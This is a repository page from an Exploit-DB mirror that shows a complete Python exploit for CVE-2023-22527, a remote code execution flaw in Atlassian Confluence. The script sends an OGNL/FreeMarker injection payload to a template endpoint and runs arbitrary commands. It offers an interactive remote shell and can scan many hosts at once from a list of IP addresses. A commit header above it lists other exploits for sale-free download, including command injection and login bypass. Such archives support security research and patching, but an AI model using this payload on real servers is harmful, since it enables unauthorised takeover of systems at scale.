bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/51904.py
Exploit-DB bbffa273d4 DB: 2024-03-19 
13 changes to exploits/shellcodes/ghdb

TELSAT marKoni FM Transmitter 1.9.5 - Backdoor Account Information Disclosure
TELSAT marKoni FM Transmitter 1.9.5 - Insecure Access Control Change Password
TELSAT marKoni FM Transmitter 1.9.5 - Root Command Injection

Atlassian Confluence < 8.5.3 - Remote Code Execution

Backdrop CMS 1.23.0 - Stored XSS

Gibbon LMS < v26.0.00 - Authenticated RCE

Quick.CMS 6.7 - SQL Injection Login Bypass

TYPO3 11.5.24 - Path Traversal (Authenticated)

WEBIGniter v28.7.23 - Stored XSS

WordPress File Upload Plugin < 4.23.3 - Stored XSS

xbtitFM 4.1.18 - Multiple Vulnerabilities

ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE
2024-03-19 00:16:26 +00:00

81 lines
No EOL
3.1 KiB
Python
Executable file
Raw Blame History

# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability
# Date: 25/1/2024
# Exploit Author: MaanVader
# Vendor Homepage: https://www.atlassian.com/software/confluence
# Software Link: https://www.atlassian.com/software/confluence
# Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
# Tested on: 8.5.3
# CVE : CVE-2023-22527
import requests
import argparse
import urllib3
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from rich.console import Console
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Argument parsing
parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")
parser.add_argument("-u", "--url", help="Single Confluence Server URL")
parser.add_argument("-f", "--file", help="File containing list of IP addresses")
parser.add_argument("-c", "--command", help="Command to Execute")
parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")
args = parser.parse_args()
# Rich console for formatted output
console = Console()
# Function to send payload
def send_payload(url, command):
headers = {
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded'
}
payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
'&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')
headers['Content-Length'] = str(len(payload))
full_url = f"{url}/template/aui/text-inline.vm"
response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)
return response.text.split('<!DOCTYPE html>')[0].strip()
# Interactive shell function
def interactive_shell(url):
session = PromptSession()
console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")
while True:
try:
cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))
if cmd.lower() in ["exit", "quit"]:
break
response = send_payload(url, cmd)
console.print(response)
except KeyboardInterrupt:
break
except Exception as e:
console.print(f"[bold red]Error: {e}[/bold red]")
break
# Process file function
def process_file(file_path):
with open(file_path, 'r') as file:
for line in file:
ip = line.strip()
url = f"http://{ip}:8090"
console.print(f"Processing {url}")
print(send_payload(url, args.command))
# Main execution logic
if args.shell and args.url:
interactive_shell(args.url)
elif args.url and args.command:
print(send_payload(args.url, args.command))
elif args.file and args.command:
process_file(args.file)
else:
print("Error: Please provide a valid URL and a command or use the interactive shell option.")
Reference in a new issue View git blame Copy permalink